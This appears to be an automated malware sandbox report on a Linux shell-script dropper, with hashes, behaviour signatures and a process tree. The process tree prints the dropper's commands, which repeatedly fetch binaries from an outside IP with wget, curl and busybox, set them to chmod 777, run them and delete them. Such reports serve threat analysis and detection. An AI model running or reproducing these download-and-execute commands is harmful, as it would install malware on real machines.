Analysis

max time kernel: 25s
max time network: 26s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system
submitted: 28/10/2024, 02:06

Static task: static1

Behavioral task behavioral1
  Sample: 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
  Resource: ubuntu1804-amd64-20240611-en

Behavioral task behavioral2
  Sample: 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
  Resource: debian9-armhf-20240611-en

Behavioral task behavioral3
  Sample: 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
  Resource: debian9-mipsbe-20240611-en

Behavioral task behavioral4
  Sample: 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
  Resource: debian9-mipsel-20240611-en
General

Target: 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Size: 10KB
MD5: d8ec12ed2845ad2e0438b2877c6b582d
SHA1: a3ac76cc85f6efe3ee7d9dc250c3167a1316c3b3
SHA256: 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24
SHA512: 459b2e4080a48df3a9e1bcb0b60ca4c80cc2c0b477289a9db6ac26410638c43ecc9c345277a59f191be55b9b37bf113d558d4d1bc8316777707737d80b280d96
SSDEEP: 192:P/TslVfHcsv+SU0iyP8okBODl/V1aBVpqcsv+So/TslVNiyP8okrzV1aBV2:P/TslVfHcsv+SU0iyP8oYODlmqcsv+Sg
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 22 IoCs)
Adversaries may modify file or directory permissions to evade defenses.

pid  Process
690  chmod
751  chmod
855  chmod
873  chmod
885  chmod
681  chmod
712  chmod
791  chmod
811  chmod
829  chmod
849  chmod
867  chmod
770  chmod
817  chmod
843  chmod
738  chmod
799  chmod
805  chmod
823  chmod
836  chmod
861  chmod
879  chmod
Executes dropped EXE (22 IoCs)

ioc                                          pid  Process
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9      682  qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd      691  7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX      713  133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5      740  51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme      752  Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc      772  gRXScggvICs157KIrJp9HsjjV4vEZKOAKc
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB      793  rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N      800  hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS      806  05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G      812  y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ      818  xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75      824  MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly      830  PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98      837  tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5      844  51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9      850  qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd      856  7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX      862  133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme      868  Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS      874  05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G      880  y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc      886  gRXScggvICs157KIrJp9HsjjV4vEZKOAKc
Checks CPU configuration (1 TTPs, 22 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.

description              ioc            Process
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
Reads runtime system information

description              ioc                            Process
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
Writes file to tmp directory (22 IoCs)
Malware often drops required files in the /tmp directory.

description                   ioc                                      Process
File opened for modification  /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly  curl
File opened for modification  /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5  curl
File opened for modification  /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX  curl
File opened for modification  /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc  curl
File opened for modification  /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd  curl
File opened for modification  /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9  curl
File opened for modification  /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX  curl
File opened for modification  /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc  curl
File opened for modification  /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G  curl
File opened for modification  /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ  curl
File opened for modification  /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75  curl
File opened for modification  /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9  curl
File opened for modification  /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme  curl
File opened for modification  /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS  curl
File opened for modification  /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd  curl
File opened for modification  /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme  curl
File opened for modification  /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N  curl
File opened for modification  /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS  curl
File opened for modification  /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98  curl
File opened for modification  /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G  curl
File opened for modification  /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5  curl
File opened for modification  /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB  curl
Processes

Process tree (path: command line (PID) [signatures]; indentation shows the parent/child level):

/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh: /tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh (PID:649)
  /bin/rm: /bin/rm bins.sh (PID:651)
  /usr/bin/wget: wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:656)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:669) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:677)
  /bin/chmod: chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:681) [File and Directory Permissions Modification]
  /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9: ./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:682) [Executes dropped EXE]
  /bin/rm: rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:684)
  /usr/bin/wget: wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:685)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:686) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:687)
  /bin/chmod: chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:690) [File and Directory Permissions Modification]
  /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd: ./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:691) [Executes dropped EXE]
  /bin/rm: rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:692)
  /usr/bin/wget: wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:694)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:700) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:706)
  /bin/chmod: chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:712) [File and Directory Permissions Modification]
  /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX: ./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:713) [Executes dropped EXE]
  /bin/rm: rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:714)
  /usr/bin/wget: wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:716)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:722) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:730)
  /bin/chmod: chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:738) [File and Directory Permissions Modification]
  /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5: ./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:740) [Executes dropped EXE]
  /bin/rm: rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:741)
  /usr/bin/wget: wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:742)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:748) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:750)
  /bin/chmod: chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:751) [File and Directory Permissions Modification]
  /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme: ./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:752) [Executes dropped EXE]
  /bin/rm: rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:753)
  /usr/bin/wget: wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:754)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:757) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:765)
  /bin/chmod: chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:770) [File and Directory Permissions Modification]
  /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc: ./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:772) [Executes dropped EXE]
  /bin/rm: rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:773)
  /usr/bin/wget: wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB (PID:774)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB (PID:780) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB (PID:786)
  /bin/chmod: chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB (PID:791) [File and Directory Permissions Modification]
  /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB: ./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB (PID:793) [Executes dropped EXE]
  /bin/rm: rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB (PID:794)
  /usr/bin/wget: wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N (PID:796)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N (PID:797) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N (PID:798)
  /bin/chmod: chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N (PID:799) [File and Directory Permissions Modification]
  /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N: ./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N (PID:800) [Executes dropped EXE]
  /bin/rm: rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N (PID:801)
  /usr/bin/wget: wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:802)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:803) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:804)
  /bin/chmod: chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:805) [File and Directory Permissions Modification]
  /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS: ./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:806) [Executes dropped EXE]
  /bin/rm: rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:807)
  /usr/bin/wget: wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:808)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:809) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:810)
  /bin/chmod: chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:811) [File and Directory Permissions Modification]
  /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G: ./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:812) [Executes dropped EXE]
  /bin/rm: rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:813)
  /usr/bin/wget: wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ (PID:814)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ (PID:815) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ (PID:816)
  /bin/chmod: chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ (PID:817) [File and Directory Permissions Modification]
  /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ: ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ (PID:818) [Executes dropped EXE]
  /bin/rm: rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ (PID:819)
  /usr/bin/wget: wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 (PID:820)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 (PID:821) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 (PID:822)
  /bin/chmod: chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 (PID:823) [File and Directory Permissions Modification]
  /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75: ./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 (PID:824) [Executes dropped EXE]
  /bin/rm: rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 (PID:825)
  /usr/bin/wget: wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly (PID:826)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly (PID:827) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly (PID:828)
  /bin/chmod: chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly (PID:829) [File and Directory Permissions Modification]
  /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly: ./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly (PID:830) [Executes dropped EXE]
  /bin/rm: rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly (PID:831)
  /usr/bin/wget: wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 (PID:832)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 (PID:833) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 (PID:834)
  /bin/chmod: chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 (PID:836) [File and Directory Permissions Modification]
  /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98: ./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 (PID:837) [Executes dropped EXE]
  /bin/rm: rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 (PID:838)
  /usr/bin/wget: wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:839)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:841) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:842)
  /bin/chmod: chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:843) [File and Directory Permissions Modification]
  /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5: ./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:844) [Executes dropped EXE]
  /bin/rm: rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 (PID:845)
  /usr/bin/wget: wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:846)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:847) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:848)
  /bin/chmod: chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:849) [File and Directory Permissions Modification]
  /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9: ./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:850) [Executes dropped EXE]
  /bin/rm: rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 (PID:851)
  /usr/bin/wget: wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:852)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:853) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:854)
  /bin/chmod: chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:855) [File and Directory Permissions Modification]
  /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd: ./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:856) [Executes dropped EXE]
  /bin/rm: rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd (PID:857)
  /usr/bin/wget: wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:858)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:859) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:860)
  /bin/chmod: chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:861) [File and Directory Permissions Modification]
  /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX: ./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:862) [Executes dropped EXE]
  /bin/rm: rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX (PID:863)
  /usr/bin/wget: wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:864)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:865) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:866)
  /bin/chmod: chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:867) [File and Directory Permissions Modification]
  /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme: ./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:868) [Executes dropped EXE]
  /bin/rm: rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme (PID:869)
  /usr/bin/wget: wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:870)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:871) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:872)
  /bin/chmod: chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:873) [File and Directory Permissions Modification]
  /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS: ./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:874) [Executes dropped EXE]
  /bin/rm: rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS (PID:875)
  /usr/bin/wget: wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:876)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:877) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:878)
  /bin/chmod: chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:879) [File and Directory Permissions Modification]
  /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G: ./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:880) [Executes dropped EXE]
  /bin/rm: rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G (PID:881)
  /usr/bin/wget: wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:882)
